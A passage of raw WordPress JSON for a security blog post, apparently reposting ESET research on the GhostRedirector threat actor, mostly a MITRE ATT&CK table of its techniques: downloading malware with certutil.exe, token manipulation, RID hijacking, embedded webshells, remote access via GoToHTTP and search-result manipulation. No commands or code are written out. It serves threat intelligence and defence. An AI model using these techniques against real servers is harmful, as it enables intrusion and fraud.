monospace;\">cmd.exe<\/span> commands to download malware.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1559\" target=\"_blank\" rel=\"noopener\">T1559<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Inter-Process Communication<\/td>\n<td style=\"height: 54px;\" width=\"265\">Comdai can create a pipe to communicate and receive information from another process.<\/td>\n<\/tr>\n<tr style=\"height: 73px;\">\n<td style=\"height: 73px;\" width=\"113\"><strong>Persistence<\/strong><\/td>\n<td style=\"height: 73px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1546\" target=\"_blank\" rel=\"noopener\">T1546<\/a><\/td>\n<td style=\"height: 73px;\" width=\"151\">Event Triggered Execution<\/td>\n<td style=\"height: 73px;\" width=\"265\">Gamshen is loaded by the IIS Worker Process (<span style=\"font-family: 
courier new, courier, monospace;\">w3wp.exe<\/span>) when the IIS server receives an inbound HTTP request.<\/td>\n<\/tr>\n<tr style=\"height: 36px;\">\n<td style=\"height: 72px;\" rowspan=\"2\" width=\"113\"><strong>Privilege Escalation<\/strong><\/td>\n<td style=\"height: 36px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1134\" target=\"_blank\" rel=\"noopener\">T1134<\/a><\/td>\n<td style=\"height: 36px;\" width=\"151\">Access Token Manipulation<\/td>\n<td style=\"height: 36px;\" width=\"265\">GhostRedirector can manipulate tokens to perform a local privilege escalation.<\/td>\n<\/tr>\n<tr style=\"height: 36px;\">\n<td style=\"height: 36px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1112\" target=\"_blank\" rel=\"noopener\">T1112<\/a><\/td>\n<td style=\"height: 36px;\" width=\"151\">Modify Registry<\/td>\n<td style=\"height: 36px;\" width=\"265\">GhostRedirector can modify a Windows registry key to perform RID hijacking.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 162px;\" rowspan=\"3\" width=\"113\"><strong>Defense Evasion<\/strong><\/td>\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1027\" target=\"_blank\" rel=\"noopener\">T1027<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Obfuscated Files or Information<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector obfuscates its local privilege escalation tools using .NET Reactor.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1027\/009\" target=\"_blank\" rel=\"noopener\">T1027.009<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Obfuscated Files or Information: Embedded Payloads<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector embedded webshells into its payloads like Zunput to be dropped on a compromised 
server.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1140\" target=\"_blank\" rel=\"noopener\">T1140<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Deobfuscate\/Decode Files or Information<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector uses AES in CBC mode to decrypt strings in the backdoor Rungan.<\/td>\n<\/tr>\n<tr style=\"height: 36px;\">\n<td style=\"height: 36px;\" width=\"113\"><strong>Discovery<\/strong><\/td>\n<td style=\"height: 36px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1083\" target=\"_blank\" rel=\"noopener\">T1083<\/a><\/td>\n<td style=\"height: 36px;\" width=\"151\">File and Directory Discovery<\/td>\n<td style=\"height: 36px;\" width=\"265\">GhostRedirector can use Zunput to list directory content on a victim\u2019s server.<\/td>\n<\/tr>\n<tr style=\"height: 55px;\">\n<td style=\"height: 235px;\" rowspan=\"4\" width=\"113\"><strong>Command and Control<\/strong><\/td>\n<td style=\"height: 55px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1105\" target=\"_blank\" rel=\"noopener\">T1105<\/a><\/td>\n<td style=\"height: 55px;\" width=\"151\">Ingress Tool Transfer<\/td>\n<td style=\"height: 55px;\" width=\"265\">GhostRedirector can abuse the tool <span style=\"font-family: courier new, courier, monospace;\">certutil.exe<\/span> to download malware.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1219\" target=\"_blank\" rel=\"noopener\">T1219<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Remote Access Software<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector may use the GoToHTTP tool for connecting remotely to victims.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a 
href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1071\/001\" target=\"_blank\" rel=\"noopener\">T1071.001<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Application Layer Protocol: Web Protocols<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector relies on HTTP to communicate with the backdoor Rungan.<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"height: 72px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1008\" target=\"_blank\" rel=\"noopener\">T1008<\/a><\/td>\n<td style=\"height: 72px;\" width=\"151\">Fallback Channels<\/td>\n<td style=\"height: 72px;\" width=\"265\">GhostRedirector can deploy the tool GoToHTTP or create malicious users on the compromised server to maintain access.<\/td>\n<\/tr>\n<tr style=\"height: 90px;\">\n<td style=\"height: 90px;\" width=\"113\"><strong>Impact<\/strong><\/td>\n<td style=\"height: 90px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1565\" target=\"_blank\" rel=\"noopener\">T1565<\/a><\/td>\n<td style=\"height: 90px;\" width=\"151\">Data Manipulation<\/td>\n<td style=\"height: 90px;\" width=\"265\">GhostRedirector can modify the response of a compromised server intended for the Google crawler, in attempts to influence search results order.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=ghostredirector-poisons-windows-servers-backdoors-side-potatoes&amp;sfdccampaignid=7011n0000017htTAAQ\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/eti-eset-threat-intelligence.png\" alt=\"\" width=\"915\" height=\"296\"\/><\/a><\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>ESET researchers have identified a new threat actor, whom we have named GhostRedirector, 
that compromised at least 65<\/p>\n","protected":false},"author":1,"featured_media":258,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-257","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/posts\/257","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/comments?post=257"}],"version-history":[{"count":0,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/posts\/257\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/media\/258"}],"wp:attachment":[{"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/media?parent=257"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/categories?post=257"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/escudodigital.uy\/index.php\/wp-json\/wp\/v2\/tags?post=257"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}